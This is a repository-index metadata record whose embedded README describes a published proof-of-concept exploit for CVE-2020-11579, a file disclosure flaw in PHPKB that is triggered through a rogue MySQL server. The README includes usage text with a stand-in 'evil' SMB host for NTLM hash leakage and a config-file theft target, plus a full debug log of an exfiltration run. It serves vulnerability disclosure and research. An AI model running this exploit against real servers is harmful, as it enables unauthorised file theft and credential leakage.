{"id":13843058,"url":"https://github.com/ShielderSec/CVE-2020-11579","last_synced_at":"2025-07-11T17:33:10.882Z","repository":{"id":146003505,"uuid":"265251143","full_name":"ShielderSec/CVE-2020-11579","owner":"ShielderSec","description":"Exploit code for CVE-2020-11579, an arbitrary file disclosure through the MySQL client in PHPKB","archived":false,"fork":false,"pushed_at":"2024-02-06T11:26:06.000Z","size":468,"stargazers_count":22,"open_issues_count":0,"forks_count":7,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-11-21T14:38:19.319Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ShielderSec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-19T13:12:48.000Z","updated_at":"2024-08-12T20:01:39.000Z","dependencies_parsed_at":null,"dependency_job_id":"1ff04dcd-9893-427d-b778-38b0e3d1a532","html_url":"https://github.com/ShielderSec/CVE-2020-11579","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ShielderSec/CVE-2020-11579","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShielderSec%2FCVE-2020-11579","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShielderSec%2FCVE-2020-11579/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShielderSec%2FCVE-2020-11579/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShielderSec%2FCVE-2020-11579/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ShielderSec","download_url":"https://codeload.github.com/ShielderSec/CVE-2020-11579/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShielderSec%2FCVE-2020-11579/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264862626,"owners_count":23675010,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:54.157Z","updated_at":"2025-07-11T17:33:10.582Z","avatar_url":"https://github.com/ShielderSec.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"# CVE-2020-11579\n\n## Introduction\n[PHPKB 9.0 Enterprise Edition (MySQL database)](https://www.knowledgebase-script.com/) is affected by an unauthenticated arbitrary file disclosure via a malicious MySQL Server. \n\nA remote attacker can read any file on a remote victim host with web-server privileges (e.g. `www-data`), via a single HTTP GET request.\n\nRead more at https://shielder.it/blog/mysql-and-cve-2020-11579-exploitation\n\n## Note\nThe script can also be run in `server-only mode` and it provides a standalone MySQL Server to use for similar vulnerabilities.\n\n## Usage\n```\nusage: CVE-2020-11579.py [-h] [-rh RHOST] -lh LHOST [-lp LPORT] [-f FILE]\n                         [-c {mysql_cli,mysqlnd}] [-s] [-d] [-o OUTPUT_FILE]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -rh RHOST, --rhost RHOST\n                        remote PHPKB webroot, e.g.:\n                        http://10.10.10.11:8080/phpkbv9\n  -lh LHOST, --lhost LHOST\n                        local host ip/hostname to expose the rogue mysql\n                        server at\n  -lp LPORT, --lport LPORT\n                        local port to expose the rogue mysql server at\n  -f FILE, --file FILE  remote file to exfiltrate, e.g.\n                        `\\\\evil.smb.server.ip\\netntlm\\leak.jpg` or PHPKB's `../../admin/include/configuration.php`\n  -c {mysql_cli,mysqlnd}, --configuration {mysql_cli,mysqlnd}\n  -s, --server-only     start rogue mysql server and wait\n  -d, --debug           enable debug mode\n  -o OUTPUT_FILE, --output-file OUTPUT_FILE\n                        save exfiltrated file to path\n```\n\n## Example run\n\n### Gif version\n![Example run gif](example.gif)\n\n### Textual version\n```\n$ ./CVE-2020-11579.py -rh http://192.168.252.130 -lh 0.0.0.0 -f '/etc/issue' -lp 3308 -d\n2020-03-17 06:22:22,796 - INFO - triggering mysql connection...\n2020-03-17 06:22:23,804 - INFO - new connection from: 192.168.252.130:55628:\n2020-03-17 06:22:23,804 - DEBUG - server -\u003e client: (Server Greeting)\n0000 50 00 00 00 0a 35 2e 31 2e 36 36 2d 30 2b 73 71 P....5.1.66-0+sq\n0010 75 65 65 7a 65 31 00 36 00 00 00 31 32 33 34 35 ueeze1.6...12345\n0020 36 37 38 00 df f7 08 02 00 00 00 15 00 00 00 00 678.............\n0030 00 00 00 00 00 00 77 68 61 74 65 76 65 72 00 6d ......whatever.m\n0040 79 73 71 6c 5f 6e 61 74 69 76 65 5f 70 61 73 73 ysql_native_pass\n0050 77 6f 72 64                                     word\n2020-03-17 06:22:23,805 - DEBUG - client -\u003e server: (len)\n0000 55 00 00                                        U..\n2020-03-17 06:22:23,805 - DEBUG - client -\u003e server: (data)\n0000 01 8d a2 0a 00 00 00 00 c0 08 00 00 00 00 00 00 ................\n0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n0020 00 74 65 73 74 00 14 fe 23 45 40 fd 5b 09 3e c8 .test...#E@.[.\u003e.\n0030 37 69 3b b0 c8 f8 9b fb 44 a0 0f 74 65 73 74 00 7i;.....D..test.\n0040 6d 79 73 71 6c 5f 6e 61 74 69 76 65 5f 70 61 73 mysql_native_pas\n0050 73 77 6f 72 64 00                               sword.\n2020-03-17 06:22:23,805 - INFO - received login info and client capabilities ^\n2020-03-17 06:22:23,805 - INFO - client has LOAD DATA LOCAL bit set (good)\n2020-03-17 06:22:23,805 - DEBUG - server -\u003e client: (Response OK)\n0000 07 00 00 02 00 00 00 02 00 00 00                ...........\n2020-03-17 06:22:23,805 - INFO - fake authentication finished\n2020-03-17 06:22:23,806 - DEBUG - client -\u003e server: (len)\n0000 0f 00 00                                        ...\n2020-03-17 06:22:23,806 - DEBUG - client -\u003e server: (data)\n0000 00 03 53 45 54 20 4e 41 4d 45 53 20 75 74 66 38 ..SET NAMES utf8\n2020-03-17 06:22:23,806 - INFO - received Request Query (this is going to be ignored) ^\n2020-03-17 06:22:23,806 - DEBUG - server -\u003e client: (file request / response TABULAR)\n0000 0b 00 00 01 fb 2f 65 74 63 2f 69 73 73 75 65    ...../etc/issue\n2020-03-17 06:22:23,806 - DEBUG - client -\u003e server: (len)\n0000 1a 00 00                                        ...\n2020-03-17 06:22:23,806 - DEBUG - client -\u003e server: (data)\n0000 02 55 62 75 6e 74 75 20 31 36 2e 30 34 2e 36 20 .Ubuntu 16.04.6\n0010 4c 54 53 20 5c 6e 20 5c 6c 0a 0a                LTS \\n \\l..\n2020-03-17 06:22:23,806 - INFO - received file contents ^\n2020-03-17 06:22:23,807 - DEBUG - client -\u003e server: (len)\n0000 00 00 00                                        ...\n2020-03-17 06:22:23,807 - DEBUG - client -\u003e server: (data)\n0000 03                                              .\n2020-03-17 06:22:23,807 - DEBUG - server -\u003e client: (Response OK)\n0000 07 00 00 04 00 00 00 02 00 00 00                ...........\n2020-03-17 06:22:23,807 - INFO - file exfiltration finished\n2020-03-17 06:22:23,807 - CRITICAL - Successfully extracted file from 192.168.252.130:55628:\nUbuntu 16.04.6 LTS \\n \\l\n\n\n2020-03-17 06:22:23,807 - DEBUG - client -\u003e server: (len)\n0000 01 00 00                                        ...\n2020-03-17 06:22:23,807 - DEBUG - client -\u003e server: (data)\n0000 00 01                                           ..\n2020-03-17 06:22:23,807 - INFO - received request command quit ^\n2020-03-17 06:22:23,807 - DEBUG - server -\u003e client: (quitting)\n0000 00                                              .\n2020-03-17 06:22:23,809 - INFO - mySQL connection successfully triggered\n2020-03-17 06:22:23,809 - INFO - stopping the server...\n```\n\n## Contribute\nHave you found a client which is not currently supported but you made it somehow work? Send a pull-request with the new client configuration (search for `# add here any new client configuration` in CVE-2020-11579.py) and we will accept it! :smile:\n\n## Credits \n* [polict](https://twitter.com/polict_) of Shielder for the vulnerability discovery and server improvements\n* [Gifts](https://github.com/Gifts) for the original rogue MySQL server","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FShielderSec%2FCVE-2020-11579","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FShielderSec%2FCVE-2020-11579","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FShielderSec%2FCVE-2020-11579/lists"}